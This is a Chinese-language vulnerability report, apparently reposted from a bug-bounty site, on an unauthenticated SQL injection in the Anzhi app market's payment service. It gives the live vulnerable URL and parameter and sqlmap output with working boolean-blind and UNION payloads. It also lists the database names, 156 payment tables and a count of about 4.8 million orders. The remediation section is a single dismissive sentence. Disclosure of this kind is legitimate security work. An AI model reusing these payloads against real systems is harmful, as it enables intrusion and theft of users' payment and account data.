安智(北京力天无限网络技术有限公司)成立于2010年2月,2011年6月获得盛大网络千万级投资。2010年5月安智论坛上线,6月推出了第一版的安智市场客户端,沿袭了先论坛,后市场的发展模式,每一步都走的驾轻就熟。截止到今天,安智已成为目前中国最知名的Android系统手机应用软件下载平台,也是用户数量最先破千万的国内第三方应用市场。
看到了很多童鞋都提交了漏洞,我也忍不住想去找找到。但是看到sql注入比较少,于是就尝试下寻找寻找。然后冲了1块钱就找到了。
安智网核心业务sql注入(涉及400多万订单信息和所有会员信息。)
看到了很多童鞋都提交了漏洞,我也忍不住想去找找到。但是看到sql注入漏洞比较少,于是就尝试下寻找寻找。然后冲了1块钱就被我找到了。看来一块钱的作用还是很大的。
不需要登录即可注入。
直接出给注入地址。pay订单页面,字符型核心注入:
https://pay.anzhi.com/web/recharge-result?orderId=16032722261270000022
[22:35:53] [INFO] GET parameter 'orderId' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'orderId' is vulnerable. Do you want to keep testing the others (i f any)? [y/N] n sqlmap identified the following injection points with a total of 71 HTTP(s) requ ests: --- Place: GET Parameter: orderId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderId=16032722261270000022' AND 3359=3359 AND 'kwdp'='kwdp Type: UNION query Title: MySQL UNION query (NULL) - 23 columns Payload: orderId=-3609' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x61784e617a424d615077,0x 71707a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
available databases [17]: [*] accesslog [*] adunion [*] adunion_admin [*] adunion_stat [*] anzhipay [*] anzhipay_history [*] information_schema [*] keta_custom [*] mysql [*] pay [*] pay_activities [*] pay_check_bill [*] performance_schema [*] quartz [*] sdk_message [*] test [*] ucenter
pay数据库 Database: pay [156 tables] +----------------------------------+ | check_money_20140106 | | check_money_20140106_pay | | dim_cp_tax | | dim_cp_tax_temp2_20130905 | | dim_cp_tax_temp_20130905 | | fct_pay_order | | fct_pay_order2 | | fct_pay_order_tmp | | fct_pay_tenpay_order | | m_activities_user | | m_activities_user_exist | | m_app_payment_type | | m_app_payment_type_20140825 | | m_app_payment_type_copy | | m_app_paytypes | | m_app_paytypes_20140718 | | m_app_paytypes_20140724 | | m_p_app_sms_suport | | m_pay_app_callback | | m_pay_count_0 | | m_pay_count_1 | | m_pay_count_10 | | m_pay_count_11 | | m_pay_count_12 | | m_pay_count_13 | | m_pay_count_14 | | m_pay_count_15 | | m_pay_count_16 | | m_pay_count_17 | | m_pay_count_18 | | m_pay_count_19 | | m_pay_count_2 | | m_pay_count_3 | | m_pay_count_4 | | m_pay_count_5 | | m_pay_count_6 | | m_pay_count_7 | | m_pay_count_8 | | m_pay_count_9 | | m_pay_inf_manage | | m_pay_paytype | | m_pay_recharge | | m_pay_recharge_type___ | | m_pay_subchannel | | m_pay_user_limit_quota | | m_pay_user_limit_quota_back | | m_rebate_wealth | | m_rebate_wealth_20141224 | | m_sms_config | | m_user_20150317 | | m_user_reward_wealth | | m_user_reward_wealth_20141127 | | m_user_reward_wealth_bak | | m_user_reward_wealth_his | | mid_cp_rate | | mid_month_money | | mid_order_id | | mid_p_app_type | | mid_p_app_type1 | | mid_p_app_type_bad | | mid_p_pay_app_month_revenue | | mid_p_pay_order_hour | | mid_p_pay_order_hour1 | | mid_p_pay_settlement | | mid_pay_order1 | | mid_pay_order2 | | p_activities_res | | p_activities_res_20150225 | | p_app_category | | p_app_channel | | p_app_gametype | | p_app_inf_rate | | p_app_info | | p_app_info_20140616 | | p_app_info_20151207 | | p_app_info_day | | p_app_rate | | p_app_rate_step | | p_app_sms | | p_app_tax | | p_dev_user_manage | | p_dev_user_manage_20150625 | | p_order_ing | | p_pay_app_month_revenue | | p_pay_app_month_revenue_20131113 | | p_pay_app_month_revenue_20140612 | | p_pay_app_month_revenue_20150624 | | p_pay_channel_order_rec | | p_pay_device | | p_pay_filter_testaccount | | p_pay_filter_testuser | | p_pay_inf_manage | | p_pay_order | | p_pay_order_1 | | p_pay_order_15042917391270000002 | | p_pay_order_2 | | p_pay_order_201404 | | p_pay_order_20150415 | | p_pay_order_3 | | p_pay_order_4 | | p_pay_order_5 | | p_pay_order_6 | | p_pay_order_7 | | p_pay_order_8 | | p_pay_order_9 | | p_pay_order_history_121229145631 | | p_pay_order_mid | | p_pay_order_tmp_0814 | | p_pay_repeat_tips | | p_pay_rules | | p_pay_sdk_update_mgr | | p_pay_sdk_upgrade_rec | | p_pay_settlement | | p_pay_settlement_20131113 | | p_pay_sms_app | | p_pay_sms_good | | p_pay_tenpay_app_month | | p_pay_tenpay_order | | p_pay_tenpay_order_count | | p_pay_tenpay_settlement | | p_pay_type | | p_pay_upload_appkey_log | | p_pay_user_app | | p_recharge_pro | | p_recharge_pro_history | | run_log_err | | t_activities_1413 | | t_auth_user | | t_auth_user_new | | t_auth_user_new_ | | t_menu | | t_menu_20140826 | | t_menu_new | | t_operation_permission | | t_role_menu | | t_role_menu_new | | t_role_operation | | t_roles | | t_roles_new | | t_user_roles | | t_user_roles_new | | task_list | | task_list_app_name | | task_log | | task_log_20140811 | | tmp_error_user | | tmp_order_id | | tmp_total_m | | tmp_user_abz | | tmp_user_consume | | tmp_user_m2azb | | tmp_user_pay | | tmp_user_red | | tmp_user_status | | zfb_order | | zfb_ording | +----------------------------------+
然后看看有多少订单:
480万差不多500万了。
sql注入就应该言简意赅。恩,就是这样。
解决方案:
sql注入,你们应该会修复的。
—-想了解更多的网站安全相关处理怎么解决关注<计算机技术网(www.ctvol.com)!!>
本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。
ctvol管理联系方式QQ:251552304
本文章地址:https://www.ctvol.com/webstt/websy/97424.html